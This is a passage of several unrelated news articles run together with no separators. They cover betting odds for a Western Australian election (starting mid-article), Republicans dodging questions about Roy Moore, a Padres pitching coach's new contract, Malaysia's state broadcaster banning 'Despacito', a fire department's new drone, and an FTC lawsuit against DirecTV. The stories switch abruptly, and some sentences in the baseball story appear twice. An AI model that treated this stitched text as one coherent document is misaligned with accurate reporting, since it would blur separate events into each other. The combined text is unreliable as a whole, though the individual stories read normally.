Electorate Government's chance of winning (%) Labor's chance of winning (%) Belmont 12.61 80.10 West Swan 10.56 78.51 Perth 12.80 75.06 Swan Hills 14.86 74.70 Morley 12.58 71.55 Forrestfield 14.64 71.45 Collie-Preston 13.66 66.24 Balcatta 28.03 63.53 Mt Lawley 27.96 60.97 Wanneroo 30.50 56.04
In electorates where the Liberals and Nationals are separate options in the market, their probabilities have been combined to represent the Government's chances of holding the seat.
Also, the totals in the above table do not add up to 100 per cent because of the presence of other parties, such as the Greens, in the markets.
The market also has Labor as more likely than the Government to win the seats of Burns Beach, Bicton and Bunbury.
The odds also suggest punters are expecting One Nation to have a significant impact in the WA election.
Using the same series of equations as before, One Nation is considered by the market to be a 37 per cent chance to win a Legislative Assembly seat and a 72 per cent chance of winning a place in the Upper House.
Obviously, all of these figures will continue to change throughout the campaign and favourable developments towards either side could sway things rapidly.
While the betting markets give political observers some idea of where things stand, 2016 offered plenty of examples of how difficult election results can be to predict.
Footnote: The odds adjustment process referred to in the article first converts the raw odd to a percentage probability. It then removes what is known as the "juice" or "vigorish" — adjustments made by the bookmaker to give it an edge on both sides of the bet. That can be done, without altering the probability implied by the raw odds, through a series of simple equations.
Topics: government-and-politics, elections, perth-6000
First posted
During an MSNBC interview on Wednesday morning, Rep. Tom Reed (R-NY) was asked to share his thoughts about Roy Moore, the homophobic and Islamophobic extremist who won a Republican primary election on Tuesday to fill an Alabama U.S. Senate seat, and whom Trump quickly embraced on Wednesday.
“As a New Yorker, remember, Roy Moore is the guy who said 9/11 was God's punishment for perverseness,” the host reminded Reed.
Reed — a Trump ally who stood by the president even after he defended the white supremacists who rallied in Charlottesville, Virginia last month — awkwardly tried to dodge the question.
Advertisement
“Well, my hope is [Moore] honors his commitment to the people of Alabama to get things done for the people back home,” Reed said.
The host pushed back, asking Reed, “You're not rattled by those views?”
Reed again tried to dodge.
“Well, you know, obviously, the concern that he has expressed, and the, ah, rhetoric that he was expressed — I'll let him answer to that question,” Reed said. “But the bottom line — he has to govern, just like we have to govern. We're going to be held accountable by the people that we represent, and now it's time to deliver for them.”
A short time later, Sen. John Hoeven (R-ND) joined MSNBC and was also asked about Moore.
“We talked about some of the things that [Moore] says he believes, like that homosexual conduct should be illegal, that 9/11 was God punishing U.S. perverseness, a personal belief President Obama was not born in the U.S. — if Roy Moore ends up winning in December, will you welcome him to the Senate? Do you have an issue with any of these things he's saying?” the host asked him.
Advertisement
Hoeven dodged, saying “I haven't had a chance to look through all of those things,” before adding that to him, “the key is going to be… what he does when he comes here.”
“Is he going to join with us and get the things done that are going to help our country and the American people?” Hoeven said. “Let's give him a chance.”
While Reed and Hoeven hedged about Moore, Trump described him on Wednesday morning as “a really great guy who ran a fantastic race.”
Spoke to Roy Moore of Alabama last night for the first time. Sounds like a really great guy who ran a fantastic race. He will help to #MAGA! — Donald J. Trump (@realDonaldTrump) September 27, 2017
Trump had publicly endorsed Moore's primary opponent, Luther Strange, and campaigned on his behalf, but quickly deleted tweets in which he expressed support for Strange after Moore's victory.
Vice President Mike Pence, meanwhile, tweeted on Tuesday that he was thrilled Moore is running on Trump's agenda.
Congratulations Roy Moore! We are thrilled you ran on the #MAGA agenda & we are for you! — Mike Pence (@mike_pence) September 27, 2017
Moore's extreme views will surely be something for which Republicans will have to answer between now and December, when he'll compete in the general election against Democrat Doug Jones. If Moore's refusal to say whether he thinks homosexuality should be punished by death isn't enough to disqualify him from being embraced by Trump and Senate Majority Leader Mitch McConnell (R-KY), then what view would be too far?
But Balsley, who has been with the organization since 2000 and has served as the pitching coach since '03, there's no place -- pardon the pun -- like home.
SAN DIEGO -- There has been ample opportunity for Padres pitching coach Darren Balsley to take a job elsewhere -- in the past and certainly this offseason.
SAN DIEGO -- There has been ample opportunity for Padres pitching coach Darren Balsley to take a job elsewhere -- in the past and certainly this offseason.
But Balsley, who has been with the organization since 2000 and has served as the pitching coach since '03, there's no place -- pardon the pun -- like home.
"I grew up a Padre fan. I wasn't born in San Diego, but I was raised in San Diego ... and the Padres were always my club," Balsley said. "I can't personally think of a better job. My alliance is to the team.
"There were a lot of opportunities to go elsewhere, but I let it be known to [general manager A.J. Preller] that this is where I wanted to stay."
• Passionate Balsley brings out best in Padres pitchers
The contracts of the existing coaches on the Padres' staff expired Saturday, but Balsley was not out of work long. He has agreed to a contract for 2016 after meeting during the weekend with new manager Andy Green. The club has not confirmed.
Retaining Balsley, 51, who is regarded as one of the top pitching coaches in the big leagues, is an important move for Green.
"We have unfinished business. I don't plan on leaving any time soon. I think we're closer than a lot of people think we are," Balsley told MLB.com on Sunday during a plane change as he flew from San Diego to his home in Knoxville, Tenn.
"It burns me a little that we haven't won a championship."
The team hasn't officially announced the contract status of the coaches, though Green said at his introductory press conference Thursday that his first order of business was talking to the existing coaches on the staff.
Video: Andy Green named new Padres manager
Assistant hitting coach Alonzo Powell, first-base coach Jose Valentin, bullpen coach Willie Blair, bench coach Dave Roberts and third-base coach Glenn Hoffman are without contracts. Some could join former Padres manager Bud Black with the Nationals, while others could return to San Diego.
Balsley, who graduated from Mount Carmel High and Palomar College, met with Green on Saturday in San Diego and felt comfortable early with the new manager.
"It was great. After talking with him for a half hour or so, it was like I had known him for a long time," Balsley said. "He wants to win ... he's familiar with our ballclub. He thinks we have the pieces we can win with."
The Padres, who finished 74-88 this past season, were 10th in the National League in ERA (4.09), as well as 13th out of 15 teams among bullpen ERA (4.02). The 4.09 mark was their highest collective ERA since 2009 (4.37).
"It was tough. We're usually known for our pitching, especially in the bullpen. We have had mediocre years before [as a team], but we've still usually pitched well," Balsley said.
The Padres lost No. 5 starter Brandon Morrow after five outings because of a right shoulder injury that later required surgery. Two key performers in the bullpen -- Shawn Kelley and Brandon Maurer -- missed time with various injuries. Starting pitcher Ian Kennedy had a disabled-list stint as well.
Injuries aside, consistency was hard to come by -- for pitchers and hitters alike.
"I'm expecting us to get back to that next year," Balsley said. "I think it was a blip on the radar. We didn't pitch up to our expectations. They could get better ... I can get better."
Corey Brock is a reporter for MLB.com. Keep track of @FollowThePadres on Twitter and listen to his podcast.
PETALING JAYA: The communications and multimedia ministry has banned Spanish hit song “Despacito” from the government-owned Radio Televisyen Malaysia (RTM) television and radio channels with immediate effect, following complaints of sexually-charged lyrics.
“RTM has stopped the song on all RTM radio stations and over RTM TV with immediate effect,” minister Salleh Said Keruak told FMT.
He said the decision was made after a public complaint which was reviewed by RTM's panel.
“They have decided to withdraw the approval of the song,” he said.
But Salleh said the song could still be accessed through other means, especially online.
“Radio airwaves are but one of the many channels through which the public, especially the younger generation, hear those songs.
“As such, we ask the radio stations to be sensitive to local norms and apply self-censorship of the song, be it by stopping the airplay or audio deleting part of the song.”
Earlier, the women's wing of Amanah urged authorities to stop the song from the airwaves, saying the lyrics were not suitable.
“Despacito” has so far gained more than two billion views on YouTube.
It is a single by Puerto Rican singer Luis Fonsi featuring rapper Daddy Yankee.
It topped the charts of 45 countries and reached the top 10 of nine others, making it Fonsi and Daddy Yankee's most successful single to date.
It is also one of the best-selling Latin singles in the United States.
A part of the lyrics read: “Let me breathe your neck slowly, Let me undress you with kisses slowly, sign the walls of your labyrinth, and make your whole body a manuscript.”
The song has taken the world by storm, with the worldwide “Despacito” fever giving way to a string of parodies, including by Malaysians.
A Malay song based on “Despacito” called “Incognito” has so far gained close to eight million views on YouTube.
In the past, suggestive songs aired over public airwaves were subjected to censors, with swear words being silenced without disrupting the flow of the song.
The newest recruit to the Dieppe Fire Department will scan emergency scenes from up above.
The municipality now has a drone for fire, rescue, disaster and other emergency and non-emergency responses.
“To my knowledge we are the first fire department in the Maritimes to use a drone,” division chief Marc Cormier, said. “We see the need for it and we're excited to operate it.”
Cormier said the drone, which cost about $3,500, including accessory equipment and batteries, can be deployed quickly, covers a lot of ground and offers a view that was previously not available to firefighters.
“It would have been nice to have during the recent apartment fire in Dieppe,” Cormier, one of the department's three approved drone operators, said. “The apartment building is several storeys high and we couldn't see on top of the roof from the ground. It would have given us a bird's-eye view of the fire burning, with the footage transferred live to a command post.”
The video footage from the drone can also be downloaded in high-resolution to the department's computers, making it valuable for continual training, too.
Drones are already popular in the United States and are making their way into Canadian fire departments, Cormier said.
The drone can fly up to 400 feet (about 122 metres) in the air (it can technically go higher but airspace at the Greater Moncton International Airport restricts the altitude to 400) and will be deployed during an emergency to predict the direction of fire travel in a large fire, or during a forest fire.
Though its flying time clocks in at about 25 minutes before the battery dies, Cormier said he'll only need to deploy it for about five minutes to get a sense of what's happening.
DIEPPE FIRE DEPARTMENT
“Once I get the data I need, it's coming down. It might stay up a bit longer if there was a large forest fire or something.”
The drone will be used in incidents involving vehicles, trains or buildings that transport or store hazardous materials, he said, but can also gather critical information on placards during hazmat spills, or hazmat fires, in lieu of the department deploying firefighters. An aerial view of a spill, fire plume and direction of smoke travel during such incidents would also assist the incident commander, Cormier said.
In a non-emergency situation, the drone could be used in building inspections to locate gas lines and ventilation units on roofs during pre-fire planning. It will also allow instructors to provide the firefighters with video of a training evaluation to be used for critique purposes.
Cormier said the drone is a great tool in the toolbox and yet another example of the department's proactive approach to firefighting and emergency response.
“We're looking at different ways to help us do our jobs and also serve the public,” he said. “This was a no brainer. The technology is there, it's affordable, so we're going to take advantage of it.”
The department operates under strict City of Dieppe guidelines relating to the Privacy Act, Cormier said, so any other information that may be collected during the drone's use will be protected, treated as confidential and destroyed if not required.
Looking ahead, Cormier said they'll be able to provide the drone's services to any neighbouring departments with mutual aid situations and there are different types of equipment to add, like an infrared camera for nighttime visuals.
“There are many things that can be explored for the future use.”
Photo
The Federal Trade Commission is suing DirecTV, the nation's largest provider of satellite television, saying it deceptively advertised costs of a two-year service promotion to consumers.
A “substantial portion” of DirecTV's more than 20 million subscribers in the United States were affected, an agency spokesman said Wednesday. And Jessica L. Rich, director of the agency's bureau of consumer protection, said the F.T.C. was seeking millions of dollars in refunds.
The agency said that the deal was introduced to consumers as a one-year subscription starting at $19.99 a month, but that the offer required a two-year contract, with escalating monthly costs and a steep cancellation fee.
“DirecTV sought to lock customers into longer and more expensive contracts and premium packages that were not adequately disclosed,” Edith Ramirez, chairwoman of the F.T.C., said in a statement. “It's a bedrock principle that the key terms of an offer to a consumer must be clear and conspicuous, not hidden in fine print.”
DirecTV, which is based in California, disputed the allegations.
“The F.T.C.'s decision is flat-out wrong, and we will vigorously defend ourselves, for as long as it takes,” Darris Gringeri, vice president for public relations of DirecTV, wrote in an email. “We go above and beyond to ensure that every new customer receives all the information they need, multiple times, to make informed and intelligent decisions.”
In the complaint, filed in the United States District Court for the Northern District of California, the agency said that DirecTV's advertising since 2007 had misled subscribers.
It also said that DirecTV had failed to make clear that the cost of service would increase by up to $45 a month in the second year, and that consumers would pay up to $480 to cancel the package before the full two years expired. Additionally, the agency charged that DirecTV advertised access to premium channels, including HBO and Showtime, as free for the first three months of service, without sufficiently disclosing that consumers had to opt out of those channels within those three months to avoid being automatically charged after the trial period ended.
“The company tells consumers to ditch cable and switch to satellite TV to save money,” Ms. Rich said. “DirecTV hid important terms in order to trick consumers into buying its satellite TV packages.”
She said that she could not be specific about the millions of dollars in refunds that the government was seeking, noting how varied consumer complaints had been.
The suit was not the first action the agency had taken against DirecTV. The company paid two settlements for telemarketing violations, in 2005 and 2009, amounting to $7.6 million in all.
Delara Derakhshani, policy counsel for Consumers Union, a public policy and advocacy division of Consumer Reports, praised the F.T.C.'s action. “You deserve to know exactly what you're going to pay down the line before you get your first bill,” she said. “Too often, consumers are told one price, only to find unexpected fees and rate hikes.”
Jeffrey Wlodarczak, a media and communications analyst at Pivotal Research Group, said he thought that the F.T.C.'s lawsuit would not have much of an impact on DirecTV's financial performance, and that DirecTV had sufficiently disclosed the terms of the contract.
“If people don't read the fine print, that's an issue,” he said. “But it was all in there. It was all disclosed in the sign-up agreement.”
Mr. Wlodarczak speculated that the F.T.C. was seeking a new level of explicitness in such disclosures. “The F.T.C. can say ‘you need to be more aggressive with disclosures,' but you can say that about anyone that markets any item,” he said. “People should probably realize that there is some long-term agreement or cancellation policy if you're getting that kind of deal.”
